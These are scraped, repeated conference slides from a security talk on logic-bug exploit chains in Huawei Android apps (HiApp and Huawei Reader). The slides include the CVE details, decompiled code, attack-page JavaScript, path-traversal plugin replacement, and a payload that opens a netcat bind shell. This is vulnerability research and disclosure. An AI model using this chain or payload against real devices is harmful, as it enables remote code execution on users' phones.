vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 13: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 14: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 15: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

